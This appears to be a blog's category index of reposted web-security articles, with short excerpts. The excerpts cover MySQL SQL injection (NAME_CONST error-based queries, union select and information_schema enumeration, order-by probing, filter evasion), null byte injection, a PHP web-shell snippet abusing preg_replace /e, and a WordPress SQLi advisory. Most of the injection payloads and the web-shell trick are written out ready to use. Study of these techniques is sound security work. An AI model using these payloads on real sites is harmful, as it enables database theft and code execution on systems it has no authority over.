随笔分类 -  Web security

Null Byte Injection
摘要:Project:WASC Threat ClassificationThreat Type:AttackReference ID: WASC-28Null Byte InjectionNull Byte Injection is an active exploitation technique used to bypass sanity checking filters in web infrastructure by adding URL-encoded null byte characters (i.e. %00, or 0x00 in hex) to the user-supplied 阅读全文
posted @ 2013-06-11 12:30 jeremyatchina 阅读(451) 评论(0) 推荐(0)
MYSQL高版本报错注入技巧-利用NAME_CONST注入
摘要:1、查看MYSQL版本and+exists(select*from+(select*from(select+name_const(@@version,0))a+join(select+name_const(@@version,0))b)c)2、爆所有库and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0×27,schema_name,0×27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from 阅读全文
posted @ 2013-06-09 16:53 jeremyatchina 阅读(2438) 评论(0) 推荐(0)
How to Allow MySQL Client to Connect to Remote MySQL server
摘要:y default, MySQL does not allow remote clients to connect to the MySQL database.If you try to connect to a remote MySQL database from your client system, you will get “ERROR 1130: Host is not allowed to connect to this MySQL server” message as shown below.$ mysql -h 192.168.1.8 -u root -pEnter passw 阅读全文
posted @ 2013-06-02 17:09 jeremyatchina 阅读(473) 评论(0) 推荐(0)
SQL Injection with INFORMATION_SCHEMA (Mysql)
摘要:[German] SQL Injection with INFORMATION_SCHEMA*******************************************************# WEBSECURITY DOCUMENTATION ## -------------------------------------- ## SQL Injection with INFORMATION_SCHEMA ## --------------------------... 阅读全文
posted @ 2013-05-09 20:23 jeremyatchina 阅读(287) 评论(0) 推荐(0)
Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息
摘要:PHP+MySQL 手工注入语句大全 推荐我PHP手工太菜了, 无奈只能补下PHP MYSQL手工注射,把收集总结的资料分享下。暴字段长度Order by num/*匹配字段and 1=1 union select 1,2,3,4,5…….n/*暴字段位置and 1=2 union select 1,2,3,4,5…..n/*利用内置函数暴数据库信息version() database() user()不用猜解可用字段暴数据库信息(有些网站不适用):and 1=2 union all select version() /*and 1=2 union all select database() 阅读全文
posted @ 2013-05-09 20:15 jeremyatchina 阅读(956) 评论(0) 推荐(0)
[轉]False SQL Injection and Advanced Blind SQL Injection
摘要:False SQL Injection and Advanced Blind SQL Injection########################################################################## ## Exploit Title: False SQL injection and advanced blind SQL injection ## Date: 21/12/2011 ## Author: wh1ant ## Company: trinitysoft ## Group: secu... 阅读全文
posted @ 2013-05-09 16:06 jeremyatchina 阅读(210) 评论(0) 推荐(0)
[轉]渗透测试必备-Firefox全套渗透装
摘要:渗透测试必备-Firefox全套渗透装工欲善必先利其器,firefox一直是各位渗透师必备的利器,小编这里推荐34款firefox渗透测试辅助插件其中包含渗透测试、信息收集、代理、加密解密等功能。1:FirebugFirefox的 五星级强力推荐插件之一,不许要多解释2:User Agent Switcher改变客户端的User Agent的一款插件3:Hackbar91ri.org的攻城师们的必备工具,提供了SQL注入和XSS攻击,能够快速对字符串进行各种编码。4:HttpFox监测和分析浏览器与web服务器之间的HTTP流量5:Live HTTP Headers即时查看一个网站的HTTP头 阅读全文
posted @ 2013-05-04 03:13 jeremyatchina 阅读(1384) 评论(0) 推荐(0)
[轉]字符形注入
摘要:字符形注入:先加引号报错后检测http://www.hacker.com/abc.php?text=abc'and '1'='1前面先闭合 后面1 没有闭合是因为程序本身有闭合后检测http://www.hacker.com/abc.php?text=abc'order by 1--http://www.hacker.com/abc.php?text=abc'order by 111111111--仔细检查是否正常和出错联合查询unionhttp://www.hacker.com/abc.php?text=abc'and 1=2 unio 阅读全文
posted @ 2013-05-04 00:44 jeremyatchina 阅读(191) 评论(0) 推荐(0)
SQLi filter evasion cheat sheet (MySQL)
摘要:SQLi filter evasion cheat sheet(MySQL)This week I presented my experiences in SQLi filter evasion techniques that I have gained during 3 years ofPHPIDSfilter evasion at the CONFidence 2.0 conference. You can find the slideshere. For a quicker reference you can use the following cheatsheet. More deta 阅读全文
posted @ 2013-04-30 17:04 jeremyatchina 阅读(273) 评论(0) 推荐(0)
Exploiting hard filtered SQL Injections
摘要:While participating at some CTF challenges like Codegate10 or OWASPEU10 recently I noticed that it is extremely trendy to build SQL injection challenges with very tough filters which can be circumvented based on the flexibleMySQL syntax. In this post I will show some example filters and how to explo 阅读全文
posted @ 2013-04-30 17:01 jeremyatchina 阅读(268) 评论(1) 推荐(0)
MySQL和php採用UTF8的方法
摘要:1. PHP 檔本身的編碼格式是 utf8 用UltraEdit(v11.20a版) 轉換所有ANSI格式的php檔案轉化為UTF-8格式: File --> Conversions --> ASCII to UTF-8 (Unicoding Editing) ( 在UltraEdit中按Advanced --> configuration --> File Handling --> Unicode/UTF-8 Detection --> 剔選Auto detect utf-8 files ) 如有需要時,可執行Remove BOM.php. 當用WinXP 阅读全文
posted @ 2013-02-01 15:43 jeremyatchina 阅读(189) 评论(0) 推荐(0)
REMOVE “EVAL(BASE64_DECODE” USING LINUX COMMANDS FROM ALL PHP FILES ACROSS MULTIPLE WORDPRESS
摘要:Yesterday, almost all installations on our test server had been infected by infamous “<?phpeval(base64_decode(…)) ?>” code injection.We have more than 600 demo sites on our test server and cleaning them using any WordPress plugin out there was simply out of the question! Can you imagine loggin 阅读全文
posted @ 2012-11-01 22:46 jeremyatchina 阅读(320) 评论(0) 推荐(0)
Web shell in php
摘要:<? $_['f']="${@phpinfo()}"; //用"才可以執行,'不行?>demo preg_replace();<?php $c = "2 4 8"; //echo ($c); //display:2 4 8 $cp = '/(\d)\s(\d)\s(\d)/e'; //pattern $cr = "'\\3*\\2+\\1='.(('\\3')-('\\2')+('\\1'))"; //r 阅读全文
posted @ 2012-10-30 21:28 jeremyatchina 阅读(518) 评论(0) 推荐(0)
WordPress Charset SQL Injection Vulnerability
摘要:WordPress Charset SQL Injection Vulnerability11 Dec. 2007SummaryWordPress is "a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability".It is found that the search function provided within WordPress fails to sanitize input based on d 阅读全文
posted @ 2012-09-28 01:10 jeremyatchina 阅读(432) 评论(0) 推荐(0)